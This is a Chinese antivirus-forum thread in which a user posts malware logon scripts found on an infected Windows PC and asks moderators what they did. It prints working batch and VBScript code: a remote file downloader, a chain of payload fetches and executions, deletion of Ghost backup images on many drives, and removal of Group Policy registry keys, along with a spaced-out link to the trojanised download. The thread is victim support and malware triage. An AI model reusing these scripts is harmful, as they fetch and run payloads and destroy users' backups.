瑞星卡卡安全论坛

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

中招我不怕,主要不甘心在提示100%没发现病毒提示下安装的,我是在几天后无意中发现进程老是cmd.exe和conime.exe同时存在,有找不到cmd.exe启动的原因,在朋友提示下找到登录脚本才发现的,现在只希望知道他下载了什么,安装了什么,还驻留了什么?删的东西是什么?我还是在华军软件圆下载的,下载地址h t t p://jsnetcom.onlinedown.com/down/zrswp3_newhua_x8z.zip,前面http加了空格,没一定功夫勿去下哈

把那几个bat、vbs、reg文件压缩传上来，我看看……

未必中毒。一些ghost系统一般都附赠一些小工具，这些文件估计也是ghost系统附赠工具的一部分，比如说那个donw.vbs（可能是快速关机脚本文件，不过文件名好像弄错了）、shijian.vbs（可能与系统时间调整有关）等。

3.bat
@Echo Off
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
regedit.exe/s %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\winrp.reg
sys.bat
@Echo Off
Del %0
ssys.bat
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping www.google.com &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs
Exit
:End
ping  &&Goto ok
Goto End
yici.bat
@Echo Off
md "%SystemRoot%\ehome"
ping  &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\ca.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\ehome\cacls.vbs
Del %0
:End
ping www.google.com &&Goto ok
Goto End
notepa.bat
@Echo Off
Del /f/s/q %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\sys.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
rename %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\ssys.bat sys.bat
:Next
Del /f/s/q d:\*.GHO
Del /f/s/q e:\*.GHO
Del /f/s/q f:\*.GHO
Del /f/s/q g:\*.GHO
Del /f/s/q h:\*.GHO
Del /f/s/q i:\*.GHO
Del /f/s/q j:\*.GHO
Del /f/s/q k:\*.GHO
Del /f/s/q %SystemRoot%\Logon\sys.bat
Del /f/s/q %SystemRoot%\Logon\shijian.vbs
Del /f/s/q %SystemRoot%\Logon\index.vbs
rd 2 /s/q %SystemRoot%\GroupPolicy
Del /f/s/q %SystemRoot%\system32\GroupPolicy\33.vbs
Del /f/s/q %SystemRoot%\system32\GroupPolicy\2.bat
dEL %0

donw.vbs

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
wscript.sleep 1
sGet.SaveToFile iLocal,1

shijian.vbs
Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000

winrp.reg
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy]

明显去下了几个文件.又删出了不少,但我在他下载的目录中没找到下载的文件,他自己删出了吗?还是没下载安装上?

打酱油的跑了啊:kaka4:

我倒，这些文件是大杀器啊，不仅强行删除组策略注册表项，还强行删除GHOST备份文件，歹毒至极……:kaka6:

如果不重装系统，修复工作会相当麻烦……:kaka7:

能告诉你们工程师测试下他下载安装什么的吗?我可是2006年注册用户

请把c:\windows\ehome这个文件夹整个用WINRAR压缩打包，提交压缩包至“可疑文件交流区”鉴定。

你的系统已严重受损，组策略不能用了，上面那些链接的网址可能是是flash木马，我要处理下你的帖子先。

请楼主把4楼的文件也压缩发至“可疑文件交流区”，我在处理链接时出错了，错删了网马地址……:kaka7:

custsat.dll 现在只有这个文件了,还要上传吗?我发的那个连接还有效,你们可以安装下啊

你该不会叫我重新安装1次木马吧?我发帖前已经把那几个文件删了

不过我当初把代码全发你们了,看4楼啊

睡觉拉,但愿明天我卡上的钱还在,估计睡不塌实.麻烦工作人员告诉你们管事的,在杀完毒后只提示没发现病毒,请把前面100%除掉可以吗:kaka10: 可以容忍有没杀到,但100%的提示有点过了

这个病毒大量使用脚本和批处理，这些脚本和批处理的命令虽然恶毒，但是却又是普及的正常的命令代码，瑞星杀毒软件对此一贯不容易加库的。

此病毒利用的是Windows开关机脚本的功能来折腾系统。

用此工具扫描即可看到开关机脚本情况：

附件: runscanner1.6.1.0附操作说明图.rar

目前瑞星杀毒软件以及瑞星的卡卡助手没能添加此毒的后期修复

国内目前针对此毒的后期修复较好的仅金山急救箱。

切,runscanner1.6.1.0是什么东西啊,扫出来的东西我也不知道是什么啊?麻烦你就直接告诉我是删系统还是你们有办法删病毒,还是取消登录脚本就暂时安全了,还是很介意你们杀完毒后100%没毒的提示,允许漏杀错杀,但别说100%,这个100%是什么意思啊?

杀完毒后100%没毒的提示仅金是个提示，不是说无限完美，这世界上本来就没有完美的系统和完美的杀毒软件。

当你扫描一个文件的时候，瑞星没能在特征库内找到对应的病毒特征，哪怕那个文件是病毒，瑞星也有那个提示。

本来应该象过去那样提示“没病毒”或者提示“病毒数量零”的。

只是不知道当初工程师是怎么个想法，弄成100%字符的。